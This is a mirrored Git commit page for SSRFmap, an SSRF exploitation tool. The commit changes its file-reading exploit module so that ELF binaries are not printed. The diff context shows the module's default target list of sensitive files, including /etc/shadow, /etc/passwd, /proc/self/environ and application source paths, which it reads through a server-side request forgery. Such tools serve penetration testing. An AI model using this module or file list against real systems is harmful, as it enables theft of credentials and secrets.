swisskyrepo
/
SSRFmap
mirror of https://github.com/swisskyrepo/SSRFmap.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #45 from daniel-corbett/add-elf-check 

MINOR: readfiles: check if output is ELF binary
pull/46/head
Swissky 2023-02-10 23:38:37 +01:00 committed by GitHub
parent 147361652e c980416e9f
commit 25a0a1ec69
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
modules/readfiles.py
View File

@ -13,6 +13,7 @@ class exploit():
def __init__(self, requester, args):
logging.info(f"Module '{name}' launched !")
self.files = args.targetfiles.split(',') if args.targetfiles != None else ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]
self.file_magic = {'elf' : bytes([0x7f, 0x45, 0x4c, 0x46])}
r = requester.do_request(args.param, "")
@ -31,7 +32,10 @@ class exploit():
# Display diff between default and ssrf request
logging.info(f"\033[32mReading file\033[0m : {f}")
print(diff)
if bytes(diff, encoding='utf-8').startswith(self.file_magic["elf"]):
print("ELF binary found - not printing to stdout")
else:
print(diff)
# Write diff to a file
filename = f.replace('\\','_').replace('/','_')